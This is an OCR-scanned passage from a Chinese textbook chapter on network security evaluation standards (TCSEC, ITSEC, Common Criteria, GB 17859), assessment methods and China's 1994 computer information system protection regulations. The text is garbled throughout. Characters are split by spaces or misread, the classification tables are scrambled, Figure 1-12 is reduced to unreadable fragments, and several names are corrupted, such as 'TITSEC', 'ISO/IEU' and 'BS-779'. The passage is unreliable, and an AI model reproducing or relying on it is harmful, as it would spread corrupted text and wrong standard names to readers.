(2) 德国 ,法 国 ,英国 、 荷 兰 四 国联 合 颁布 的 (信息 技术 安全 评价 标准 》。 

(3) 加 拿 大 颁布 的 (可 信 计 算 机 产品 安全 评价 标准 》。 

(4) 美国. 加拿大、 德国、 法国、 英国、 荷兰 六 国联 合 颁布 的 (信息 技术 安全 评价 通用 
标准 》。 

(5) 中 国 国家 质量 技术 监督 局 颁布 的 (计算 机 信息 系统 安全 保护 等 级 划分 准则 》。 





有 1. 国外 网 络 安全 评价 准则 


世界 国际 性 标准 化 组 织 主要 包括 : 国际 标准 化 组 织 (ISO)、 国 际 电器 技术 委员 会 (IEC) 
及 国际 电信 联盟 (ITU) 所 属 的 电信 标准 化 组 织 (ITU-TS) 等 。ISO 是 总 体 标准 化 组 织 , 而 
IEC 在 电工 与 电子 技术 领域 里 相当 于 ISO 的 位 置 。1987 年 ,ISO 的 TC97 和 IEC 的 TCs47B/83 
合并 成 为 ISO/IEU 联合 技术 委员 会 (JTC1)。ITU-TS 则 是 一 个 联合 缔约 组 织 。 这 些 组 织 
在 安全 需求 服务 分 析 指 导 安全 技术 研制 开发 .安全 评估 标准 等 方面 制定 了 一 些 标准 草案 。 

此 外 ,其 他 的 标准 化 组 织 也 制定 了 一 些 安 全 标准 ,如 Internet 工程 任务 组 IETF 
(Internet Engineering Task Force) 有 9 个 功能 组 : 认证 防火 墙 测试 组 C(AFT) 、 公 共 认 证 技 
术 组 (CAT) ,域名 安全 组 (DNSSec) \IP 安全 协议 组 (IPSec) ,一 次 性 密码 认证 组 (OTP)、 公 
开 密 钥 结 构 组 (PKIX) ,安全 界面 组 (SecSH)、 简 单 公 开 密 钥 结 构 组 (SPKI) ,传输 层 安全 组 
(TLS) 和 Web 安全 组 (WTS) 等 ,并 制定 了 相关 标准 。 

1) 美国 (可 信 计 算 系 统 评价 准则 》 

美国 在 1983 年 由 国防 部 制定 的 5200. 28 安全 标准 一 一 (可 信 计 算 系 统 评价 准则 》 
(Trusted Computer Standards Evaluation Criteria ,TCSEC) , 即 网 络 安全 橙 皮 书 或 橘 皮 
书 , 主 要 利用 计算 机 安全 级 别 评 价 计 算 机 系统 的 安全 性 。 将 安全 分 为 4 个 方面 (类 别 ): 安 
全 政策 .可 说 明 性 、 安 全 保障 和 文档 。 将 这 4 个 方面 (类 别 ) 又 分 为 7 个 安全 级 别 , 从 低 到 高 
依次 为 D.C1`C2、B1、B2、.B3 和 A 级 。 从 1985 年 开始 , 橙 皮 书 成 为 美国 国防 部 的 标准 以 后 
基本 没有 更 改 , 一 直 是 评估 多 用 户主 机 和 小 型 操作 系统 的 主要 方法 。 

对 数据 库 和 网 络 其 他 子 系统 也 一 直 用 橙 皮 书 进行 评估 。 橙 皮 书 将 网 络 安全 的 级 别 从 低 
到 高 分 成 4 个 类 别 : D 类 、C 类 、B 类 和 A 类 ,并 分 为 7 个 级 别 , 如 表 1-4 所 示 。 
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表 1-4 网 络 系统 安全 级 别 分 类 


























类 别 级 别 名 称 主要 特征 

D D 低级 保护 没有 安全 保护 

世 Ct 自主 安全 保护 自主 存储 控制 
C2 受 控 存储 控制 单独 的 可 查 性 ,安全 标识 
Bl 标识 的 安全 保护 强制 存 取 控制 ,安全 标识 

B B2 结构 化 保护 面向 安全 的 体系 结构 , 较 好 的 抗 渗透 能 力 
B3 安全 区 域 存 取 监控 、 高 抗 渗透 能 力 

A A 验证 设计 形式 化 的 最 高 级 描述 和 验证 














2) 欧洲 《信息 技术 安全 评估 标准 》 

《信息 技术 安全 评估 标准 》(Information Technology Security Evaluation Criteria ， 
TITSEC) ,俗称 欧洲 的 信息 安全 白皮书 ,将 保密 作为 安全 增强 功能 , 仅 限 于 阐述 技术 安全 要 
求 , 并 未 将 保密 措施 直接 与 计算 机 功能 相 结合 。ITSEC 是 欧洲 的 英国 法国、 德国 和 荷兰 等 
四 国 在 借鉴 橙 皮 书 的 基础 上 ,在 1989 年 联合 提出 的 。 橙 皮 书 将 保密 作为 安全 重点 ,而 
ITSEC 则 将 首次 提出 的 完整 性 .可 用 性 与 保密 性 作为 同等 重要 的 因素 ,并 将 可 信 计 算 机 的 
概念 提高 到 可 信 信 息 技术 的 高 度 。ITSEC 定义 了 从 E0 级 (不 满足 品质 ) 到 E6 级 (形式 化 验 
证 ) 的 7 个 安全 等 级 ,对 于 每 个 系统 安全 功能 可 分 别 定义 。ITSEC 预定 义 了 10 种 功能 ,其 
中 前 5 种 与 橙 皮 书 中 的 C1 一 B3 级 基本 类 似 。 在 欧洲 ,ITSEC BS 7799 列 出 了 网 络 威胁 的 
种 类 和 管理 要 项 ,以 及 降低 攻击 危害 的 方法 。1999 年 将 BS 7799 档案 进行 了 重 写 ,增加 的 内 
容 包括 : 审计 过 程 、 对 文件 系统 审计 、 评 估 风 险 、 保 持 对 病毒 的 控制 .正确 处 理 日 常事 务 及 安 
全 保护 的 信息 等 。 

3) 美国 联邦 准则 标准 

美国 联邦 准则 (Federal Criteria , FC) 标准 参照 了 加 拿 大 的 评价 标准 CTCPEC 与 橙 皮 
书 TCSEC ,目的 是 提供 TCSEC 的 升级 版 本 ,同时 保护 已 有 建设 和 投资 。FC 是 一 个 过 渡 标 
准 ,之 后 结合 ITSEC 发 展 为 联合 公共 准则 一 一 通用 评估 准则 (CC)。 实 际 上 ,FC 是 对 
TCSEC 的 升级 ,并 引入 了 “保护 轮廓 ”(PP) 的 概念 。 每 个 轮廓 都 包括 功能 、 开 发 保证 和 评价 
三 部 分 。FC 充分 吸取 了 ITSEC 和 CTCPEC 的 优点 , 供 美国 的 政府 、 民 间 和 商业 领域 应 
用 ,如 网 络 游戏 产品 的 安全 性 检测 。 

4) 通用 评估 准则 

通用 评估 准则 (Common Criteria for IT Security Evaluation,，CC) 主 要 用 于 确定 评估 
信息 技术 产品 和 系统 安全 性 的 基本 准则 ,提出 了 国际 上 公认 的 表述 信息 技术 安全 性 的 结构 ， 
将 安全 要 求 分 为 规范 产品 和 系统 安全 行为 的 功能 要 求 ,以 及 解决 如 何 正确 有 效 地 实施 这 些 
功能 的 保证 要 求 。CC 由 美国 等 国家 与 国际 标准 化 组 织 联合 提出 ,并 结合 了 FC 及 ITSEC 
的 主要 特征 ,强调 将 网 络 信息 安全 的 功能 与 保障 分 离 ,将 功能 需求 分 为 9 类 63 族 ,将 保障 分 
为 7 类 29 族 。 其 先进 性 体现 在 其 结构 的 开放 性 、 表 达 方式 的 通用 性 ,以 及 结构 及 表达 方式 
的 内 在 完备 性 和 实用 性 四 个 方面 。CC 标准 于 1996 年 发 布 第 一 版 ,充分 结合 并 替代 了 
ITSEC、TCSEC 等 国际 上 重要 的 信息 安全 评估 标准 而 成 为 通用 评估 准则 。CC 标准 历经 了 
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较 多 更 新 和 改进 。 目 前 ,中 国 测评 中 心 主 要 采用 CC 等 进行 测评 ,具体 内 容 及 应 用 可 查阅 相 
关 网 站 。 

5) ISO 安全 体系 结构 标准 
国际 标准 ISO 7498-2 一 1989《 信 息 处 理 系 统一 一 开放 系统 互 连 基本 参考 模型 ) 第 2 部 分 
“安全 体系 结构 ”, 作 为 开放 系统 标准 建立 框架 。 主 要 用 于 提供 网 络 安全 服务 与 有 关机 制 的 
一 般 描述 ,确定 在 参考 模型 内 部 可 提供 这 些 服务 与 机 制 。 此 标准 从 体系 结构 的 角度 描述 了 
ISO 基本 参考 模型 之 间 的 网 络 安全 通信 必须 提供 的 网 络 安全 服务 和 安全 机 制 ,并 说 明了 网 
络 安 全 服务 及 其 相应 机 制 在 安全 体系 结构 中 的 关系 ,从 而 建立 了 开放 互 连 系 统 的 安全 体系 
结构 框架 。 并 在 身份 认证 ,访问 控制 ,数据 加 密 、 数 据 完整 性 和 防止 抵赖 方面 ,提供 了 5 种 可 
选择 的 网 络 安全 服务 ,可 以 根据 不 同 的 网 络 安全 需求 采取 相应 的 评估 标准 ,如 表 1-5 所 示 。 

表 1-5 ISO 提供 的 安全 服务 

服 务 用 途 
身份 验证 ”| 身份 验证 是 证 明 用 户 及 服务 器 身份 的 过 程 
访问 控制 人 
数据 保密 。 | 通常 使 用 加 密 技术 保护 数据 免 于 未 授权 的 泄露 ,可 避免 被 动 威胁 
数据 完整 性 | 这 项 服务 通过 检验 或 维护 信息 的 一 致 性 ,避免 主动 威胁 
抗 否 认 性 否认 是 指 否 认 参 加 全 部 或 部 分 事务 的 能 力 , 抗 否认 服务 提供 关于 服务 、 过 程 或 部 分 信息 的 

起 源 证 明 或 发 送 证 明 























于 2000 年 12 月 发 行 的 ISO 17799/BS-779 标准 ,适用 于 所 有 的 组 织 , 目 前 已 成 为 强制 
性 的 安全 标准 。 包 括 信息 安全 的 所 有 准则 ,由 信息 安全 方针 、 组 织 安全 .财产 分 类 和 控制 .人 
员 安 全 ,物理 和 环境 安全 .计算 机 通信 和 操作 管理 .访问 控制 ,系统 开发 与 维护 .商务 持续 性 
管理 ,符合 性 10 个 独立 的 部 分 组 成 ,其 中 每 一 部 分 都 覆盖 不 同 的 主题 和 区 域 。 

目前 ,国际 上 通行 的 与 网 络 信息 安全 有 关 的 标准 可 分 为 3 类 ,如 图 1-12 所 示 。 




































































网 络 和 信息 安全 标准 
互 操作 标准 技术 与 工程 标准 安全 管理 标准 

[ I I I [ 
加 | | 安 | | 安 | | 安 | | 脆 | | 信 | | 成 安 | | 信 | | 信 | | 系 | | 信 信 | | 信 
密 | | 全 | | 全 | | 全 | | 弱 | | 县 | | 熟 全 | | 奶 | | 县 | | 统 | | 息 明 | | 扔 
标 | | 传 | | 交 | | 人 性 产 | | 度 系 | | 系 | | 和 | | 和 | | 安 安 | | 安 
准 | | 和 输 | | 件 | | 易 | | 描 | | 品 | | 模 统 | | 统 | | 相 | | 软 | | 全 全 | | 全 
标 | | 标 标 | | 述 通 | | 型 工 | | 软 | | 关 | | 件 评 管 | | 管 
准 | | 准 | | 准 | | 标 | | 月 程 | | 件 | | 技 | | 整 | | 估 理 | | 理 
准 | | 测 能 | | 过 | | 术 | | 合 | | 公 体 | | 标 
评 力 | | 程 | | 控 共 系 | | 准 

准 评 | | 制 准 标 

则 估 戎 则 准 
















































































图 1-12 有关 网 络 和 信息 安全 标准 种 类 
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12. 国内 网 络 安全 评估 准则 


1) 系统 安全 保护 等 级 划分 准则 

在 我 国 , 经 过 国家 质量 技术 监督 局 1999 年 10 月 批准 发 布 的 (系统 安全 保护 等 级 划分 准 
则 》, 主 要 依据 GB 17859 一 1999《 计 算 机 信息 系统 安全 保护 等 级 划分 准则 》 和 GA 163 一 1997 
《计算 机 信息 系统 安全 专用 产品 分 类 原则 ;等 文件 ,将 计算 机 系统 安全 保护 划分 为 以 下 5 个 
级 别 ,如 表 1-6 所 示 ,分 别 是 用 户 自 主 保护 级 .系统 审计 保护 级 .安全 标记 保护 级 、 结 构 化 保 








护 级 和 访问 验证 保护 级 。 
表 1-6 我 国 计 算 机 系统 安全 保护 等 级 划分 
等 级 名 称 描述 
第 一 级 | 用 户 自主 保护 级 tt 





除 具备 第 一 级 所 有 的 安全 保护 功能 外 ,要 求 创建 和 维护 访问 的 审计 跟踪 
记录 ,使 所 有 用 户 对 自身 行为 的 合法 性 负责 

除 具备 前 一 级 所 有 的 安全 保护 功能 外 ,还 要 求 以 访问 对 象 标 记 的 安全 级 
别 限制 访问 者 的 权限 ,实现 对 访问 对 象 的 强制 访问 

除 具 备 前 一 级 所 有 的 安全 保护 功能 外 ,还 将 安全 保护 机 制 划 分 为 关键 部 
第 四 级 | 结构 化 保护 级 ”| 分 和 非 关 键 部 分 ,对 关键 部 分 可 直接 控制 访问 者 对 访问 对 象 的 存 取 ,从 而 
加 强 系统 的 抗 渗 透 能 力 

除 具备 前 一 级 所 有 的 安全 保护 功能 外 ,还 特别 增设 了 访问 验证 功能 ,负责 
仲裁 访问 者 对 访问 对 象 的 所 有 访问 


第 二 级 | 系统 审计 保护 级 





第 三 级 | 安全 标记 保护 级 














第 五 级 | 访问 验证 保护 级 


我 国 从 2002 年 以 来 ,提出 的 有 关 信 息 安全 实施 等 级 保护 问题 ,经 过 专家 多 次 反复 论证 
研究 ,其 相关 制度 得 到 不 断 细 化 和 完善 。2006 年 3 月 公安 部 在 原 有 条 款 基 础 上 修改 制定 并 
开始 实施 了 《信息 安全 等 级 保护 管理 办 法 (试行 )》。 将 我 国信 息 安全 分 五 级 防护 ,分 别 为 自 
主 保护 级 指导 保护 级 ,监督 保护 级 .强制 保护 级 和 专 控 保护 级 。 国 际 上 通行 的 做 法 是 对 信 
息 安 全 进行 分 级 保护 ,涉及 国家 安全 ,社会 稳定 的 重要 部 门将 实施 强制 监管 ,规定 使 用 的 操 
作 系统 必 须 有 三 级 以 上 的 信息 安全 保护 。 

2) 我 国信 息 安全 标准 化 现状 

信息 安全 标准 责任 重大 , 事 关 国家 及 网 络 用 户 安全 ,各 国 均 在 借鉴 国际 标准 的 基础 上 ， 
结合 本 国 国情 制定 并 完善 各 国 的 信息 安全 标准 化 组 织 和 标准 。 其 标准 不 仅 是 信息 安全 保障 
体系 的 重要 组 成 部 分 ,而 且 是 政府 进行 宏观 管理 的 重要 依据 。 

在 中 国 的 信息 安全 标准 化 建设 方面 ,主要 按照 国务 院 授 权 , 在 国家 质量 监督 检验 检疫 总 
局 管理 下 ,由 国家 标准 化 管理 委员 会 统一 管理 全 国标 准 化 工作 ,该 委员 会 下 设 有 255 个 专业 
技术 委员 会 。 中 国标 准 化 工作 实行 统一 管理 与 分 工 负责 相 结 合 的 管理 体制 ,有 88 个 国务 院 
有 关 行 政 主管 部 门 和 国务 院 授权 的 有 关 行 业 协 会 分 工 管理 本 部 门 、 本 行业 的 标准 化 工作 ,有 
31 个 省 、 自 治 区、 直辖 市 政府 有 关 行 政 主管 部 门 分 工 管理 本 行政 区 域内 、 本 行业 的 标准 化 工 
作 。1984 年 成 立 的 全 国信 息 技 术 安 全 标准 化 技术 委员 会 (CITS) ,在 国家 标准 化 管理 委员 会 
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及 工业 和 信息 化 部 的 共同 领导 下 负责 全 国信 息 技 术 领 域 以 及 与 ISO/IEC JTC1 相对 应 的 标 
准 化 工作 ,下 设 24 个 分 技术 委员 会 和 特别 工作 组 ,是 目前 国内 最 大 的 标准 化 技术 委员 会 ,是 
一 个 具有 广泛 代表 性 ,权威 性 和 军民 结合 的 信息 安全 标准 化 组 织 。 工 作 范 围 是 负责 信息 和 
通信 安全 的 通用 框架 方法 .技术 和 机 制 的 标准 化 ,以 及 国内 外 对 应 的 标准 化 工作 。 其 网 络 
技术 安全 包括 : 开放 式 安全 体系 结构 各 种 安全 信息 交换 的 语义 规则 ,有关 的 应 用 程序 接口 
和 协议 引用 安全 功能 的 接口 等 。 

我 国信 息 安全 标准 化 进程 起 步 晚 发展 快 。 从 20 世纪 80 年 代 开始 ,积极 借鉴 国际 标准 
的 原则 ,制定 了 一 批 符合 中 国 国情 的 信息 安全 标准 和 行业 标准 ,为 我 国信 息 安 全 技术 的 发 展 
做 出 了 很 大 的 贡献 。 据 统计 ,我 国 从 1985 年 发 布 第 一 个 有 关 信 息 安 全 方面 的 标准 以 来 ,到 
目前 为 止 ,已 制定 .报批 和 发 布 近 百 个 有 关 信 息 安 全 技术 产品、 测评 和 管理 的 国家 标准 ,并 
正在 制定 和 完善 新 的 标准 ,为 信息 安全 保障 与 管理 奠定 了 重要 基础 。 


PP 1.5.2 网 络 安 全 测评 


利用 先进 的 网 络 测评 技术 和 方法 ,通过 对 计算 机 网 络 系统 进行 全 面 、 充 分 有 效 的 安全 
测评 ,可 以 查找 并 分 析出 网 络 安全 漏洞 .隐患 和 风险 ,以 便 采取 措施 提高 系统 防御 及 抗 攻 击 
能 力 。 对 照 评估 及 测评 标准 ,依据 网 络 安全 评估 结果 、 业 务 的 安全 需求 .安全 策略 和 安全 目 
标 ,提出 合理 的 安全 防护 措施 建议 和 解决 方案 。 


1. 测评 目的 和 方法 


1) 网 络 安全 测评 目的 

企 事业 机 构 进行 网 络 安全 测评 目的 包括 以 下 内 容 。 

(1) 查 清 企 事 业 机 构 具 体 信 息 资产 的 实际 价值 及 状况 。 

(2) 明确 机 构 具 体 信息 资源 的 保密 性 、 完 整 性 、 可 用 性 和 可 审查 性 的 风险 威胁 及 程度 。 

(3) 通过 调研 分 析 , 搞 清 当 前 机 构 网 络 系统 实际 存在 的 具体 漏洞 隐患 及 状况 。 

(4) 明确 与 该 机 构 信息 资产 有 关 的 风险 和 具体 需要 改进 之 处 。 

(5) 提出 改变 现状 的 具体 建议 和 方案 ,使 风险 降低 到 可 接受 的 水 平 。 

(6) 为 制订 合理 的 网 络 安全 构建 计划 和 策略 提供 依据 。 

2) 网 络 安全 测评 类 型 

通常 ,通用 的 测评 类 型 分 为 以 下 5 种 。 

(1) 系统 级 漏洞 测评 。 主 要 检测 计算 机 系统 的 漏洞 .隐患 和 基本 安全 策略 及 状况 。 

(2) 网 络 级 风险 测评 。 主 要 测评 相关 的 所 有 计算 机 网 络 及 信息 基础 设施 的 风险 范围 。 

(3) 机 构 的 风险 测评 。 对 整个 机 构 进行 整体 风险 分 析 , 分 析 对 其 信息 资产 的 具体 威胁 
和 隐患 ,分 析 处 理 信息 漏洞 和 隐患 ,对 实体 系统 及 运行 环境 的 各 种 信息 进行 检验 。 

(4) 实际 人 侵 测试 。 对 具有 成 熟 系统 安全 程序 的 机 构 ,进行 检验 该 机 构 对 具体 模式 的 
网 络 人 侵 的 实际 反映 能 力 。 

(5) 审计 测试 。 深 入 实际 检查 具体 的 网 络 安全 策略 和 网 络 系统 运行 记录 情况 ,以 及 该 
组 织 具体 执行 的 情况 。 
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3) 调研 与 测评 方法 

在 实际 调研 和 测评 时 ,收集 信息 主要 有 3 个 基本 信息 源 : 调研 对 象 , 文 本 查阅 和 物理 检 
验 。 调 研 对 象 主要 是 与 现 有 系统 安全 和 组 织 实施 相关 人 员 ,重点 是 熟悉 情况 的 人 员 和 管理 
者 。 为 了 准确 测评 所 保护 的 信息 资源 及 资产 ,对 问题 的 调研 提纲 应 尽量 简单 易 懂 , 且 所 提供 
的 信息 与 调研 人 员 无 直接 利害 关系 ,同时 审查 现 有 的 安全 策略 及 关键 的 配置 情况 ,包括 已 经 
完成 和 正在 草拟 或 修改 的 文本 。 还 应 搜集 来 自 对 该 组 织 的 各 种 设施 的 审查 信息 。 

具体 的 测评 方法 有 网 络 安全 威胁 隐患 与 态势 测评 方法 、 模 糊 综合 风险 测评 法 、 基 于 弱点 
关联 和 安全 需求 的 网 络 安全 测评 方法 .基于 失效 树 分 析 法 的 网 络 安全 风险 状态 测评 方法 、 贝 
叶 斯 网 络 安全 测评 方法 等 。 


12. 测评 标准 和 内 容 


(1) 测评 准备 。 在 网 络 安全 实际 测评 前 ,应 重点 考察 3 个 方面 的 测评 因素 : 计算 机 ( 服 
务 器 ) 及 其 网 络 设备 安装 的 场 区 环境 的 安全 性 ; 设备 和 设施 的 质量 安全 可 靠 性 ; 外 部 运行 环 
境 及 内 部 运行 环境 相对 安全 性 ,系统 管理 员 可 信任 度 和 配合 测评 是 否 愿 意 情况 等 。 

(2) 依据 和 标准 。 主 要 根据 前 两 节 中 介绍 的 ISO 或 国家 有 关 的 通用 评估 准则 CC《 信 
息 安全 技术 评估 通用 准则 兴 计 算 机 信息 系统 安全 保护 等 级 划分 准则 》 和 《信息 安全 等 级 保护 
管理 办 法 (试行 )) 等 作为 评估 标准 。 

经 过 各 方 认真 研究 和 讨论 达成 的 相关 标准 及 协议 ,也 可 以 作为 测评 的 重要 依据 。 

(3) 测评 内 容 。 对 网 络 安全 的 评估 内 容 主要 包括 : 安全 策略 测评 、 网 络 实体 (物理 ) 安 全 
测评 、 网 络 体系 安全 测评 、 安 全 服务 测评 、 病 毒 防护 安全 性 测评 、 审 计 安 全 性 测评 、 备 份 安全 
性 测评 .紧急 事件 响应 测评 和 安全 组 织 与 管理 测评 等 。 


有 3. 安全 策略 测评 


(1) 测评 项 目 。 利 用 网 络 系统 规划 及 设计 文档 ,安全 需求 分 析 文 档 、 网 络 安全 风险 测评 
文档 和 网 络 安全 目标 ,测评 网 络 安全 策略 的 有 效 性 。 

(2) 测评 方法 。 采 用 专家 分 析 的 方法 ,主要 测评 安全 策略 实施 及 效果 ,主要 包括 : 安全 
需求 满足 情况 ` 安 全 目标 实现 情况 、 安 全 策略 有 效 性 、 实 现 情况 .符合 安全 设计 原则 情况 、 各 
安全 策略 一 致 程度 等 。 

(3) 测评 结论 。 依 据 测评 的 具体 结果 ,对 比 网 络 安全 策略 的 完整 性 、 准 确 性 和 一 致 性 。 


14. 网 络 实体 安全 测评 


(1) 测评 项 目 。 主 要 测评 项 目 有 网 络 基 础 设施 、 配 电 系 统 、 服 务 器 、 交 换 机 、 路 由 器 、 配 
线 柜 . 主 机房、 工作 站 、 工 作 间 、 记 录 媒 体 及 运行 环境 。 

(2) 测评 方法 。 采 用 专家 分 析 法 ,主要 测评 物理 访问 控制 (包括 安全 隔离 .门禁 控制 . 访 
问 权限 和 时 限 \ 访 问 登记 等 ) 、 安 全 防护 措施 (防盗 、 防 水、 防火 、 防 震 等 )、 备 份 (安全 恢复 中 需 
要 的 重要 部 件 的 备份 ) 及 运行 环境 等 的 要 求 是 否 实现 、 满 足 安全 需求 。 

(3) 测评 结论 。 依 据 实际 测评 结果 ,确定 网 络 系统 的 实际 实体 安全 及 运行 环境 情况 。 
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Es. 网 络 体系 的 安全 性 测评 


1) 网 络 隔离 的 安全 性 测评 

(1) 测评 项 目 。 主 要 测评 项 目 包括 以 下 3 个 方面 : 网 络 系统 内 部 与 外 部 的 隔离 的 安全 
性 、 内 部 虚 网 划分 和 网 段 的 划分 的 安全 性 、 远 程 连接 (VPN、 路 由 等 ) 的 安全 性 。 

(2) 测评 方法 。 主 要 利用 检测 侦 听 工具 测评 防火 墙 过 滤 和 交换 机 、 路 由 器 实现 虚 网 
划分 的 情况 。 采 用 漏洞 扫描 软件 测评 防火 墙 、 交 换 机 和 路 由 其 是 否 存在 安全 漏洞 及 漏洞 
程度 。 

(3) 测评 结论 。 依 据 实际 测评 结果 ,表述 网 络 隔 离 的 安全 性 情况 。 

2) 网 络 系统 配置 安全 性 测评 

(1) 测评 项 目 。 主 要 测评 项 目 包括 以 下 7 个 方面 : 网 络 设备 ,如 路 由 器 、 交 换 机 、 
HUB 的 网 络 管理 代理 是 否 修 改 了 默认 值 ; @ 防 止 非 授 权 用 户 远 程 登录 路 由 器 、 交 换 机 等 网 
络 设备 的 措施 情况 ; @ 企 事业 机 构 网 络 系统 的 服务 模式 的 安全 设置 是 否 合适 ; @ 服 务 端口 
开放 及 具体 管理 情况 ; @ 应 用 程序 及 服务 软件 版 本 加 固 和 更 新 程度 ; @ 网 络 操作 系统 的 漏 
洞 及 更 新 情况 ; @ 网 络 系统 设备 的 安全 性 情况 。 

(2) 测评 方法 和 工具 。 主 要 常用 的 测评 方法 和 工具 包括 : 采用 漏洞 扫描 软件 ,测试 网 
络 系统 存在 的 漏洞 和 隐患 情况 ; @ 检 查 网 络 系统 采用 的 各 设备 是 否 采 用 了 安全 性 得 到 认证 
的 产品 ; @@ 依 据 设 计 文 档 , 检 查 网 络 系统 配置 是 否 被 更 改 和 更 改 原 因 等 是 否 满足 安全 需求 。 

(3) 测评 结论 。 依 据 测评 结果 ,表述 网 络 系统 配置 的 安全 情况 。 

3) 网 络 防护 能 力 测评 

(1) 测评 项 目 。 主 要 对 拒绝 服务 .电子 欺骗 ,网 络 侦 听 .入 侵 等 攻击 形式 是 否 采 取 了 相 
应 的 防护 措施 及 防护 措施 是 否 有 效 。 

(2) 测评 方法 。 主 要 采用 模拟 攻击 ,漏洞 扫描 软件 ,评测 网 络 防护 能 力 。 

(3) 测评 结论 。 根 据 评 测 结果 ,表述 网 络 防护 能 力 。 

4) 服务 的 安全 性 测评 

(1) 测评 项 目 。 主 要 测评 项 目 包括 : 服务 隔离 的 安全 性 ,根据 信息 敏感 级 别 要 求 是 否 
实现 了 不 同 服务 的 隔离 ; 思 服 务 的 脆弱 性 ,系统 开放 的 服务 (DNS.FTP、E-mail HTTP 等 ) 
是 否 存在 安全 漏洞 。 

(2) 测评 方法 。 中 采用 漏洞 扫描 软件 ,测试 网 络 系统 开放 的 服务 是 否 存在 安全 漏洞 ， 
@ 模 拟 各 服务 的 实现 条 件 , 检 测 服务 的 运行 情况 。 

(3) 测评 结论 。 根 据 评 测 结果 .表述 服务 的 安全 性 。 

5) 应 用 系统 的 安全 性 测评 

(1) 测评 项 目 。 主 要 测评 应 用 程序 是 否 存在 安全 漏洞 ; 应 用 系统 的 访问 授权 、 访 问 控制 
等 防护 措施 的 安全 性 。 

(2) 测评 方法 。 主 要 采用 专家 分 析 和 模拟 测试 的 方法 。 

(3) 测评 结论 。 根 据 测评 结果 ,表述 应 用 程序 的 安全 性 。 
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Le. 安全 服务 的 测评 


(1) 测评 项 目 。 主 要 包括 认证 ,授权 、 数 据 安全 性 (保密 性 ,完整 性 可用性、 可 控 性 、 可 
审查 性 ) ,逻辑 访问 控制 等 。 

(2) 测评 方法 。 采 用 扫描 检测 等 工具 截获 数据 包 , 分 析 上 述 各 项 是 否 满足 安全 需求 。 

(3) 测评 结论 。 依 据 测 评 结果 ,表述 安全 服务 的 充分 性 和 有 效 性 。 


EL. 病毒 防护 安全 性 测评 


(1) 测评 项 目 。 主 要 检测 服务 器 、 工 作 站 和 网 络 系统 是 否 配 备 了 有 效 的 防 病毒 软件 及 
病毒 清查 的 执行 情况 。 

(2) 测评 方法 。 主 要 利用 专家 分 析 和 模拟 测评 等 测评 方法 。 

(3) 测评 结论 。 依 据 测 评 结果 ,表述 对 计算 机 病毒 防范 的 具体 情况 。 





ls. 审计 的 安全 性 测评 


(1) 测评 项 目 。 主 要 包括 审计 数据 的 生成 方式 安全 性 、 数 据 充 分 性 、 存 储 安全 性 、 访 问 
安全 性 及 防 自 改 的 安全 性 。 

(2) 测评 方法 。 主 要 采用 专家 分 析 和 模拟 测试 等 测评 方法 。 

(3) 测评 结论 。 依 据 测评 具体 结果 表述 审计 的 安全 性 。 





9. 备份 的 安全 性 测评 


(1) 测评 项 目 。 主 要 包括 备份 方式 的 有 效 性 、 备 份 的 充分 性 、 备 份 存储 的 安全 性 和 备份 
的 访问 控制 情况 等 。 

(2) 测评 方法 。 采 用 专家 分 析 的 方法 ,依据 系统 的 安全 需求 、 业 务 的 连续 性 计划 ,测评 
备份 的 安全 性 情况 。 

(3) 测评 结论 。 依 据 测 评 结果 ,表述 备份 系统 的 安全 性 。 





有 10. 紧急 事件 响应 测评 


(1) 测评 项 目 。 主 要 包括 紧急 事件 响应 程序 及 其 有 效 处 理 情况 ,以 及 平时 的 准备 情况 
(备份 和 演练 )。 

(2) 测评 方法 。 模 拟 紧急 事件 响应 条 件 ,检测 响应 程序 是 否 有 序 且 有 效 处 理 安全 事件 。 

(3) 测评 结论 。 依 据 实际 测评 结果 ,对 紧急 事件 响应 程序 的 充分 性 有 效 性 对 比 评价 。 





由 11. 安全 组 织 和 管理 测评 


(1) 测评 项 目 。 吕 建立 安全 组 织 机 构 和 设置 安全 机 构 或 部 门 情况 ; @ 检 查 网 络 管理 条 
例 及 落实 情况 ,明确 规定 网 络 应 用 目的 、 应 用 范围 .应 用 要 求 、 违 反 惩罚 规定 、 用 户 入 网 审批 
程序 等 情况 ; 加 每 个 相关 网 络 人 员 的 安全 责任 是 否 明确 及 落实 情况 ; @ 查 清 合 适 的 信息 处 
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理 设施 授权 程序 ; @ 实 施 网 络 配置 管理 情况 ; @ 规 定 各 作业 的 合理 工作 规程 情况 ; 明确 
具体 翔实 的 人 员 安 全 性 的 规程 情况 ; @ 记 载 翔 实 、 有 效 的 安全 事件 响应 程序 情况 ; @ 有 关 人 
员 涉 及 各 种 管理 规定 ,对 其 详细 内 容 掌 握 情 况 ; 四 机 构 相 应 的 保密 制度 及 落实 情况 ; @@ 账 
号 ,口令 ,权限 等 授权 和 管理 制度 及 落实 情况 ; @ 定 期 安全 审核 和 安全 风险 测评 制度 及 落实 
情况 ; @ 管 理 员 定 期 培训 和 资质 考核 制度 及 落实 情况 。 

(2) 测评 方法 。 主 要 利用 专家 分 析 的 方法 、 考 核 法 审计 方法 和 调查 的 方法 。 在 实际 测 
评 过 程 中 ,需要 根据 具体 情况 ,采用 具体 测评 方法 。 

(3) 测评 结论 。 根 据 实际 的 测评 结果 ,评价 安全 组 织 机 构 和 安全 管理 是 否 充 分 有 效 。 


> 1.5.3 信息 安全 保护 制度 


信息 安全 技术 标准 只 是 度量 信息 系统 或 产品 安全 性 的 技术 规范 ,但 信息 安全 技术 标准 
的 实施 必须 通过 信息 安全 法 规 来 保障 。 为 了 保护 计算 机 信息 系统 的 安全 ,促进 计算 机 的 应 
用 和 发 展 ,保障 社会 主义 现代 化 建设 的 顺利 进行 ,1994 年 2 月 18 日 ,中 华人 民 共 和 国 国务 院 
发 布 了 第 147 号 令 ( 中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 》( 以 下 简称 (安全 保护 条 
例 》) ,为 计算 机 信息 系统 提供 了 安全 保护 制度 。 

《安全 保护 条 例 )》 从 信息 系统 建设 和 应 用 ,安全 等 级 保护 ,计算机 机 房 .国际 联网 、 媒 体 进 
出 境 ,安全 管理 .计算 机 犯罪 案件 计算 机 病毒 防范 和 安全 专用 产品 销售 9 个 方面 规定 了 安 
全 保护 制度 ,同时 规定 了 重点 信息 安全 保护 范围 .主管 部 门 、 监 督 职权 和 违反 尖端 科学 技术 
等 重要 领域 的 计算 机 信息 系统 安全 属于 重点 保护 范围 ; 公安 部 主管 全 国 计 算 机 系统 安全 保 
护 工作 ; 公安 机 关 行 使 国家 安全 部 ,监督 职权 ; 国家 安全 部 、 国 家 保密 局 和 国务 院 其 他 有 关 
